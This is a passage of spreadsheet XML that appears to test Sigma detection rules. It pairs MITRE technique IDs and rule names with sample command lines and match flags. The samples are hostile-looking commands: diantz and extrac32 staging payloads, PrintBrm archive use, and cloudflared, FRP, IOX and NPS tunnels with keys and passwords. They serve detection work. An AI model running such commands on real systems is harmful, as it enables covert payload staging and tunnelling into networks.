          <t>Suspicious Diantz Download and Compress Into a CAB File</t>
        </is>
      </c>
      <c r="D605" s="43" t="inlineStr">
        <is>
          <t>185d7418-f250-42d0-b72e-0c8b70661e93</t>
        </is>
      </c>
      <c r="E605" s="43" t="inlineStr">
        <is>
          <t>diantz.exe payload.exe C:\Windows\Tasks\archive.cab /v</t>
        </is>
      </c>
      <c r="F605" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G605" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H605" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I605" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J605" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K605" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="606" ht="15.75" customHeight="1" s="42">
      <c r="A606" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B606" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_extrac32</t>
        </is>
      </c>
      <c r="C606" s="43" t="inlineStr">
        <is>
          <t>Suspicious Extrac32 Execution</t>
        </is>
      </c>
      <c r="D606" s="43" t="inlineStr">
        <is>
          <t>aa8e035d-7be4-48d3-a944-102aec04400d</t>
        </is>
      </c>
      <c r="E606" s="43" t="inlineStr">
        <is>
          <t>extrac32.exe /C \\127.0.0.1\share\archive.zip C:\path\to\extract\file.txt</t>
        </is>
      </c>
      <c r="F606" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G606" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H606" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I606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606" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K606" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="607" ht="15.75" customHeight="1" s="42">
      <c r="A607" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B607" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_extrac32</t>
        </is>
      </c>
      <c r="C607" s="43" t="inlineStr">
        <is>
          <t>Suspicious Extrac32 Execution</t>
        </is>
      </c>
      <c r="D607" s="43" t="inlineStr">
        <is>
          <t>aa8e035d-7be4-48d3-a944-102aec04400d</t>
        </is>
      </c>
      <c r="E607" s="43" t="inlineStr">
        <is>
          <t>extrac32.exe /c C:\path\to\source.cab C:\path\to\destination.txt</t>
        </is>
      </c>
      <c r="F607" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G607" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H607" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I607" s="43" t="inlineStr">
        <is>
          <t>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607" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K607" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="608" ht="15.75" customHeight="1" s="42">
      <c r="A608" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B608" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_extrac32</t>
        </is>
      </c>
      <c r="C608" s="43" t="inlineStr">
        <is>
          <t>Suspicious Extrac32 Execution</t>
        </is>
      </c>
      <c r="D608" s="43" t="inlineStr">
        <is>
          <t>aa8e035d-7be4-48d3-a944-102aec04400d</t>
        </is>
      </c>
      <c r="E608" s="43" t="inlineStr">
        <is>
          <t>extrac32.exe /E /A \\127.0.0.1\share\archive.cab C:\path\to\extract\</t>
        </is>
      </c>
      <c r="F608" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G608" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H608" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I608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608" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K608" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="609" ht="15.75" customHeight="1" s="42">
      <c r="A609" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B609" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C609" s="43" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D609" s="43" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E609" s="43" t="inlineStr">
        <is>
          <t>PrintBrm.exe -f "C:\Users\Public\data.zip" -b</t>
        </is>
      </c>
      <c r="F609" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G609" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H609" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I609" s="43" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468)</t>
        </is>
      </c>
      <c r="J609" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K609" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="610" ht="15.75" customHeight="1" s="42">
      <c r="A610" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B610" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C610" s="43" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D610" s="43" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E610" s="43" t="inlineStr">
        <is>
          <t>PrintBrm.exe -fC:\Users\Public\data.zip -b</t>
        </is>
      </c>
      <c r="F610" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G610" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H610" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I610" s="43" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468); Suspicious Download from Office Domain (00d49ed5-4491-4271-a8db-650a4ef6f8c1)</t>
        </is>
      </c>
      <c r="J610" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K610" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="611" ht="15.75" customHeight="1" s="42">
      <c r="A611" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B611" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C611" s="43" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D611" s="43" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E611" s="43" t="inlineStr">
        <is>
          <t>PrintBrm.exe -f C:\Users\Public\data.zip</t>
        </is>
      </c>
      <c r="F611" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G611" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H611" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I611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611" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K611" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="612" ht="15.75" customHeight="1" s="42">
      <c r="A612" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B612" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C612" s="43" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D612" s="43" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E612" s="43" t="inlineStr">
        <is>
          <t>PrintBrm.exe -f:C:\Users\Public\data.zip -b</t>
        </is>
      </c>
      <c r="F612" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G612" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H612" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I612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612" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K612" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="613" ht="15.75" customHeight="1" s="42">
      <c r="A613" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B613" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C613" s="43" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D613" s="43" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E613" s="43" t="inlineStr">
        <is>
          <t>PrintBrm.exe -f C:\Users\Public\data.7z</t>
        </is>
      </c>
      <c r="F613" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G613" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H613" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I613" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J613" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K613" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="614" ht="15.75" customHeight="1" s="42">
      <c r="A614" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B614" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C614" s="43" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D614" s="43" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E614" s="43" t="inlineStr">
        <is>
          <t>set ZIP_PATH=C:\Users\Public\data.zip &amp;&amp; PrintBrm.exe -f %ZIP_PATH% -b</t>
        </is>
      </c>
      <c r="F614" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G614" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H614" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I614" s="43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614" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K614" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="615" ht="15.75" customHeight="1" s="42">
      <c r="A615" s="43" t="inlineStr">
        <is>
          <t>t1090.001</t>
        </is>
      </c>
      <c r="B615" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_quicktunnel_execution</t>
        </is>
      </c>
      <c r="C615" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Quick Tunnel Execution</t>
        </is>
      </c>
      <c r="D615" s="43" t="inlineStr">
        <is>
          <t>222129f7-f4dc-4568-b0d2-22440a9639ba</t>
        </is>
      </c>
      <c r="E615" s="43" t="inlineStr">
        <is>
          <t>"cloudflared.exe" --url http://example.com</t>
        </is>
      </c>
      <c r="F615" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G615" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H615" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I615" s="43" t="inlineStr">
        <is>
          <t>Renamed Cloudflared.EXE Execution (e0c69ebd-b54f-4aed-8ae3-e3467843f3f0); Cloudflared Quick Tunnel Execution (222129f7-f4dc-4568-b0d2-22440a9639ba)</t>
        </is>
      </c>
      <c r="J615" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K615" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="616" ht="15.75" customHeight="1" s="42">
      <c r="A616" s="43" t="inlineStr">
        <is>
          <t>t1090.001</t>
        </is>
      </c>
      <c r="B616" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_quicktunnel_execution</t>
        </is>
      </c>
      <c r="C616" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Quick Tunnel Execution</t>
        </is>
      </c>
      <c r="D616" s="43" t="inlineStr">
        <is>
          <t>222129f7-f4dc-4568-b0d2-22440a9639ba</t>
        </is>
      </c>
      <c r="E616" s="43" t="inlineStr">
        <is>
          <t>"cloudflared.exe" -url http://example.com</t>
        </is>
      </c>
      <c r="F616" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G616" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H616" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I616" s="43" t="inlineStr">
        <is>
          <t>Renamed Cloudflared.EXE Execution (e0c69ebd-b54f-4aed-8ae3-e3467843f3f0); Cloudflared Quick Tunnel Execution (222129f7-f4dc-4568-b0d2-22440a9639ba)</t>
        </is>
      </c>
      <c r="J616" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K616" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="617" ht="15.75" customHeight="1" s="42">
      <c r="A617" s="43" t="inlineStr">
        <is>
          <t>t1090.001</t>
        </is>
      </c>
      <c r="B617" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_quicktunnel_execution</t>
        </is>
      </c>
      <c r="C617" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Quick Tunnel Execution</t>
        </is>
      </c>
      <c r="D617" s="43" t="inlineStr">
        <is>
          <t>222129f7-f4dc-4568-b0d2-22440a9639ba</t>
        </is>
      </c>
      <c r="E617" s="43" t="inlineStr">
        <is>
          <t>"cloudflared.exe" --url=http://example.com</t>
        </is>
      </c>
      <c r="F617" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G617" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H617" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I617" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Quick Tunnel Execution (222129f7-f4dc-4568-b0d2-22440a9639ba)</t>
        </is>
      </c>
      <c r="J617" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K617" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="618" ht="15.75" customHeight="1" s="42">
      <c r="A618" s="43" t="inlineStr">
        <is>
          <t>t1090.001</t>
        </is>
      </c>
      <c r="B618" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_quicktunnel_execution</t>
        </is>
      </c>
      <c r="C618" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Quick Tunnel Execution</t>
        </is>
      </c>
      <c r="D618" s="43" t="inlineStr">
        <is>
          <t>222129f7-f4dc-4568-b0d2-22440a9639ba</t>
        </is>
      </c>
      <c r="E618" s="43" t="inlineStr">
        <is>
          <t>"cloudflared.exe" --url "http://example.com"</t>
        </is>
      </c>
      <c r="F618" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G618" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H618" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I618" s="43" t="inlineStr">
        <is>
          <t>Renamed Cloudflared.EXE Execution (e0c69ebd-b54f-4aed-8ae3-e3467843f3f0); Cloudflared Quick Tunnel Execution (222129f7-f4dc-4568-b0d2-22440a9639ba)</t>
        </is>
      </c>
      <c r="J618" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K618" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="619" ht="15.75" customHeight="1" s="42">
      <c r="A619" s="43" t="inlineStr">
        <is>
          <t>t1090.001</t>
        </is>
      </c>
      <c r="B619" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_quicktunnel_execution</t>
        </is>
      </c>
      <c r="C619" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Quick Tunnel Execution</t>
        </is>
      </c>
      <c r="D619" s="43" t="inlineStr">
        <is>
          <t>222129f7-f4dc-4568-b0d2-22440a9639ba</t>
        </is>
      </c>
      <c r="E619" s="43" t="inlineStr">
        <is>
          <t>"cloudflared.exe" --url http://example.com -no-autoupdate</t>
        </is>
      </c>
      <c r="F619" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G619" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H619" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I619" s="43" t="inlineStr">
        <is>
          <t>Renamed Cloudflared.EXE Execution (e0c69ebd-b54f-4aed-8ae3-e3467843f3f0); Cloudflared Tunnel Execution (9a019ffc-3580-4c9d-8d87-079f7e8d3fd4)</t>
        </is>
      </c>
      <c r="J619" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K619" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="620" ht="15.75" customHeight="1" s="42">
      <c r="A620" s="43" t="inlineStr">
        <is>
          <t>t1102</t>
        </is>
      </c>
      <c r="B620" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_cleanup</t>
        </is>
      </c>
      <c r="C620" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Connections Cleanup</t>
        </is>
      </c>
      <c r="D620" s="43" t="inlineStr">
        <is>
          <t>7050bba1-1aed-454e-8f73-3f46f09ce56a</t>
        </is>
      </c>
      <c r="E620" s="43" t="inlineStr">
        <is>
          <t>cloudflared tunnel cleanup --config C:\temp\config.yml</t>
        </is>
      </c>
      <c r="F620" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G620" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H620" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I620" s="43" t="inlineStr">
        <is>
          <t>Renamed Cloudflared.EXE Execution (e0c69ebd-b54f-4aed-8ae3-e3467843f3f0); Cloudflared Tunnel Connections Cleanup (7050bba1-1aed-454e-8f73-3f46f09ce56a); Cloudflared Tunnel Connections Cleanup (7050bba1-1aed-454e-8f73-3f46f09ce56a)</t>
        </is>
      </c>
      <c r="J620" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K620" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="621" ht="15.75" customHeight="1" s="42">
      <c r="A621" s="43" t="inlineStr">
        <is>
          <t>t1102</t>
        </is>
      </c>
      <c r="B621" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_cleanup</t>
        </is>
      </c>
      <c r="C621" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Connections Cleanup</t>
        </is>
      </c>
      <c r="D621" s="43" t="inlineStr">
        <is>
          <t>7050bba1-1aed-454e-8f73-3f46f09ce56a</t>
        </is>
      </c>
      <c r="E621" s="43" t="inlineStr">
        <is>
          <t>cloudflared.exe tunnel cleanup -config C:\temp\config.yml</t>
        </is>
      </c>
      <c r="F621" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G621" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H621" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I621" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Connections Cleanup (7050bba1-1aed-454e-8f73-3f46f09ce56a)</t>
        </is>
      </c>
      <c r="J621" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K621" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="622" ht="15.75" customHeight="1" s="42">
      <c r="A622" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B622" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_frp</t>
        </is>
      </c>
      <c r="C622" s="43" t="inlineStr">
        <is>
          <t>PUA - Fast Reverse Proxy (FRP) Execution</t>
        </is>
      </c>
      <c r="D622" s="43" t="inlineStr">
        <is>
          <t>32410e29-5f94-4568-b6a3-d91a8adad863</t>
        </is>
      </c>
      <c r="E622" s="43" t="inlineStr">
        <is>
          <t>proxy_service.exe --config C:\Windows\Temp\config.conf</t>
        </is>
      </c>
      <c r="F622" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G622" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H622" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I622" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J622" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K622" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="623" ht="15.75" customHeight="1" s="42">
      <c r="A623" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B623" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_frp</t>
        </is>
      </c>
      <c r="C623" s="43" t="inlineStr">
        <is>
          <t>PUA - Fast Reverse Proxy (FRP) Execution</t>
        </is>
      </c>
      <c r="D623" s="43" t="inlineStr">
        <is>
          <t>32410e29-5f94-4568-b6a3-d91a8adad863</t>
        </is>
      </c>
      <c r="E623" s="43" t="inlineStr">
        <is>
          <t>proxy_service.exe -c C:/Windows/Temp/config.conf</t>
        </is>
      </c>
      <c r="F623" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G623" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H623" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I623" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J623" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K623" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="624" ht="15.75" customHeight="1" s="42">
      <c r="A624" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B624" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_frp</t>
        </is>
      </c>
      <c r="C624" s="43" t="inlineStr">
        <is>
          <t>PUA - Fast Reverse Proxy (FRP) Execution</t>
        </is>
      </c>
      <c r="D624" s="43" t="inlineStr">
        <is>
          <t>32410e29-5f94-4568-b6a3-d91a8adad863</t>
        </is>
      </c>
      <c r="E624" s="43" t="inlineStr">
        <is>
          <t>proxy_service.exe -c C:\Windows\Temp\config.conf</t>
        </is>
      </c>
      <c r="F624" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G624" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H624" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I624" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J624" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K624" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="625" ht="15.75" customHeight="1" s="42">
      <c r="A625" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B625" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_iox</t>
        </is>
      </c>
      <c r="C625" s="43" t="inlineStr">
        <is>
          <t>PUA- IOX Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D625" s="43" t="inlineStr">
        <is>
          <t>d7654f02-e04b-4934-9838-65c46f187ebc</t>
        </is>
      </c>
      <c r="E625" s="43" t="inlineStr">
        <is>
          <t>"iox.exe" -fwd -l 8080</t>
        </is>
      </c>
      <c r="F625" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G625" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H625" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I625" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J625" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K625" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="626" ht="15.75" customHeight="1" s="42">
      <c r="A626" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B626" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nps</t>
        </is>
      </c>
      <c r="C626" s="43" t="inlineStr">
        <is>
          <t>PUA - NPS Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D626" s="43" t="inlineStr">
        <is>
          <t>68d37776-61db-42f5-bf54-27e87072d17e</t>
        </is>
      </c>
      <c r="E626" s="43" t="inlineStr">
        <is>
          <t>npc.exe -server=192.168.1.1 -vkey=testkey -password=\" -config=custom.conf</t>
        </is>
      </c>
      <c r="F626" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G626" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H626" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I626" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J626" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K626" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="627" ht="15.75" customHeight="1" s="42">
      <c r="A627" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B627" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nps</t>
        </is>
      </c>
      <c r="C627" s="43" t="inlineStr">
        <is>
          <t>PUA - NPS Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D627" s="43" t="inlineStr">
        <is>
          <t>68d37776-61db-42f5-bf54-27e87072d17e</t>
        </is>
      </c>
      <c r="E627" s="43" t="inlineStr">
        <is>
          <t>npc.exe -s 192.168.1.1 -v testkey -p password -config=custom.conf</t>
        </is>
      </c>
      <c r="F627" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G627" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H627" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I627" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J627" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K627" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="628" ht="15.75" customHeight="1" s="42">
      <c r="A628" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B628" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nps</t>
        </is>
      </c>
      <c r="C628" s="43" t="inlineStr">
        <is>
          <t>PUA - NPS Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D628" s="43" t="inlineStr">
        <is>
          <t>68d37776-61db-42f5-bf54-27e87072d17e</t>
        </is>
      </c>
      <c r="E628" s="43" t="inlineStr">
        <is>
          <t>npc.exe -server=10.0.0.1:443 -vkey=key123 -password=pass123 --config=myconfig.ini</t>
        </is>
      </c>
      <c r="F628" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G628" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H628" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I628" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J628" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K628" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="629" ht="15.75" customHeight="1" s="42">
      <c r="A629" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B629" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nps</t>
        </is>
      </c>
      <c r="C629" s="43" t="inlineStr">
        <is>
          <t>PUA - NPS Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D629" s="43" t="inlineStr">
        <is>
          <t>68d37776-61db-42f5-bf54-27e87072d17e</t>
        </is>
      </c>
      <c r="E629" s="43" t="inlineStr">
        <is>
          <t>npc.exe server=10.0.0.1 vkey=mykey pass=mypass</t>
        </is>
      </c>
      <c r="F629" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G629" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H629" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I629" s="43" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE (782d6f3e-4c5d-4b8c-92a3-1d05fed72e63); New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J629" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K629" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="630" ht="15.75" customHeight="1" s="42">
      <c r="A630" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B630" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nps</t>
        </is>
      </c>
      <c r="C630" s="43" t="inlineStr">
        <is>
          <t>PUA - NPS Tunneling Tool Execution</t>
        </is>
      </c>
      <c r="D630" s="43" t="inlineStr">
        <is>
          <t>68d37776-61db-42f5-bf54-27e87072d17e</t>
        </is>
      </c>
      <c r="E630" s="43" t="inlineStr">
        <is>
          <t>npc.exe -server=192.168.1.100:8080 -vkey=secret123 -password=admin123</t>
        </is>
      </c>
      <c r="F630" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G630" s="43" t="b">
        <v>1</v>
      </c>
